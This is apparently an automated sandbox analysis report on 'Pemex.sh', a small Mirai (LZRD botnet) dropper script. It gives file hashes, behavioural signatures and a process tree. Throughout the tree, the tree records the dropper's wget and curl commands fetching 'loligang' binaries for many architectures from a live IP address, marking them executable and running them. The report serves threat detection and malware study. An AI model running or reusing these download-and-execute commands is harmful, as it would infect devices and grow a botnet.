Analysis

  • max time kernel
    82s
  • max time network
    152s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    23-12-2024 06:16

General

  • Target

    Pemex.sh

  • Size

    1KB

  • MD5

    e18ba04d72384ac85e6117c774f6d4f9

  • SHA1

    6cb8e9a2da2db042da0875a08f43cc867b8a2c5b

  • SHA256

    289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e

  • SHA512

    3e69c0fdb07347f2dcd8d3b3d9514d392a572173afec60fd702180cf3f7d5d21bca67dff2cb022641c7f0a2df4b817f1589a6a1599726ddeea67ba5c768e954d

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large (194282) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 20 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Enumerates active TCP sockets 1 TTPs 10 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads system network configuration 1 TTPs 10 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 2 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/Pemex.sh
    /tmp/Pemex.sh
    1⤵
    • Writes file to tmp directory
    PID:1497
    • /usr/bin/wget
      wget http://185.255.120.43/lmaoWTF/loligang.x86
      2⤵
      • Writes file to tmp directory
      PID:1498
    • /usr/bin/curl
      curl -O http://185.255.120.43/lmaoWTF/loligang.x86
      2⤵
      • Writes file to tmp directory
      PID:1503
    • /bin/cat
      cat loligang.x86
      2⤵
        PID:1504
      • /bin/chmod
        chmod +x awoo config-err-WSc3G3 loligang.x86 netplan_sl6cks9p Pemex.sh snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-mS7W0R
        2⤵
        • File and Directory Permissions Modification
        PID:1505
      • /tmp/awoo
        ./awoo
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Reads system network configuration
        • Reads runtime system information
        PID:1506
      • /usr/bin/wget
        wget http://185.255.120.43/lmaoWTF/loligang.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1510
      • /usr/bin/curl
        curl -O http://185.255.120.43/lmaoWTF/loligang.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1516
      • /bin/chmod
        chmod +x awoo config-err-WSc3G3 loligang.mips loligang.x86 netplan_sl6cks9p Pemex.sh snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-mS7W0R
        2⤵
        • File and Directory Permissions Modification
        PID:1525
      • /tmp/awoo
        ./awoo
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Reads system network configuration
        • Reads runtime system information
        PID:1526
      • /usr/bin/wget
        wget http://185.255.120.43/lmaoWTF/loligang.mpsl
        2⤵
        • Writes file to tmp directory
        PID:1530
      • /usr/bin/curl
        curl -O http://185.255.120.43/lmaoWTF/loligang.mpsl
        2⤵
        • Writes file to tmp directory
        PID:1535
      • /bin/chmod
        chmod +x awoo config-err-WSc3G3 loligang.mips loligang.mpsl loligang.x86 netplan_sl6cks9p Pemex.sh snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-mS7W0R
        2⤵
        • File and Directory Permissions Modification
        PID:1537
      • /tmp/awoo
        ./awoo
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Reads system network configuration
        • Reads runtime system information
        PID:1538
      • /usr/bin/wget
        wget http://185.255.120.43/lmaoWTF/loligang.arm4
        2⤵
          PID:1542
        • /usr/bin/curl
          curl -O http://185.255.120.43/lmaoWTF/loligang.arm4
          2⤵
          • Writes file to tmp directory
          PID:1546
        • /bin/chmod
          chmod +x awoo config-err-WSc3G3 loligang.arm4 loligang.mips loligang.mpsl loligang.x86 netplan_sl6cks9p Pemex.sh snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-mS7W0R
          2⤵
          • File and Directory Permissions Modification
          PID:1549
        • /tmp/awoo
          ./awoo
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1550
        • /usr/bin/wget
          wget http://185.255.120.43/lmaoWTF/loligang.arm5
          2⤵
          • Writes file to tmp directory
          PID:1554
        • /usr/bin/curl
          curl -O http://185.255.120.43/lmaoWTF/loligang.arm5
          2⤵
          • Writes file to tmp directory
          PID:1559
        • /bin/chmod
          chmod +x awoo config-err-WSc3G3 loligang.arm4 loligang.arm5 loligang.mips loligang.mpsl loligang.x86 netplan_sl6cks9p Pemex.sh snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-mS7W0R
          2⤵
          • File and Directory Permissions Modification
          PID:1561
        • /tmp/awoo
          ./awoo
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1562
        • /usr/bin/wget
          wget http://185.255.120.43/lmaoWTF/loligang.arm6
          2⤵
          • Writes file to tmp directory
          PID:1566
        • /usr/bin/curl
          curl -O http://185.255.120.43/lmaoWTF/loligang.arm6
          2⤵
          • Writes file to tmp directory
          PID:1572
        • /bin/chmod
          chmod +x awoo config-err-WSc3G3 loligang.arm4 loligang.arm5 loligang.arm6 loligang.mips loligang.mpsl loligang.x86 netplan_sl6cks9p Pemex.sh snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-mS7W0R
          2⤵
          • File and Directory Permissions Modification
          PID:1574
        • /tmp/awoo
          ./awoo
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1575
        • /usr/bin/wget
          wget http://185.255.120.43/lmaoWTF/loligang.arm7
          2⤵
          • Writes file to tmp directory
          PID:1579
        • /usr/bin/curl
          curl -O http://185.255.120.43/lmaoWTF/loligang.arm7
          2⤵
          • Writes file to tmp directory
          PID:1583
        • /bin/chmod
          chmod +x awoo config-err-WSc3G3 loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.x86 netplan_sl6cks9p Pemex.sh snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-mS7W0R
          2⤵
          • File and Directory Permissions Modification
          PID:1585
        • /tmp/awoo
          ./awoo
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1586
        • /usr/bin/wget
          wget http://185.255.120.43/lmaoWTF/loligang.ppc
          2⤵
          • Writes file to tmp directory
          PID:1590
        • /usr/bin/curl
          curl -O http://185.255.120.43/lmaoWTF/loligang.ppc
          2⤵
          • Writes file to tmp directory
          PID:1594
        • /bin/chmod
          chmod +x awoo config-err-WSc3G3 loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.ppc loligang.x86 netplan_sl6cks9p Pemex.sh snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-mS7W0R
          2⤵
          • File and Directory Permissions Modification
          PID:1596
        • /tmp/awoo
          ./awoo
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1597
        • /usr/bin/wget
          wget http://185.255.120.43/lmaoWTF/loligang.m68k
          2⤵
          • Writes file to tmp directory
          PID:1601
        • /usr/bin/curl
          curl -O http://185.255.120.43/lmaoWTF/loligang.m68k
          2⤵
          • Writes file to tmp directory
          PID:1605
        • /bin/chmod
          chmod +x awoo config-err-WSc3G3 loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.m68k loligang.mips loligang.mpsl loligang.ppc loligang.x86 netplan_sl6cks9p Pemex.sh snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-mS7W0R
          2⤵
          • File and Directory Permissions Modification
          PID:1607
        • /tmp/awoo
          ./awoo
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1608
        • /usr/bin/wget
          wget http://185.255.120.43/lmaoWTF/loligang.sh4
          2⤵
          • Writes file to tmp directory
          PID:1612
        • /usr/bin/curl
          curl -O http://185.255.120.43/lmaoWTF/loligang.sh4
          2⤵
          • Writes file to tmp directory
          PID:1616
        • /bin/chmod
          chmod +x awoo config-err-WSc3G3 loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.m68k loligang.mips loligang.mpsl loligang.ppc loligang.sh4 loligang.x86 netplan_sl6cks9p Pemex.sh snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-mS7W0R
          2⤵
          • File and Directory Permissions Modification
          PID:1618
        • /tmp/awoo
          ./awoo
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1619

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • /tmp/loligang.x86

        Filesize

        64KB

        MD5

        2354f2531c0bf296738fa7733c42785f

        SHA1

        86508e4ee74c70bf226f6666bf227a12be69dcad

        SHA256

        3d0b5252c0f8736759af8b122612395ea484794afbdeb5435769f3c164d04c93

        SHA512

        eda30463d2e8355af4d6626815aedb78b1b5d43c4df53e4a9a72405074a22e9fd09f54e882b0c5ad5136202907a7e6e599d29d325d6e0b3188e6f8ff77abe679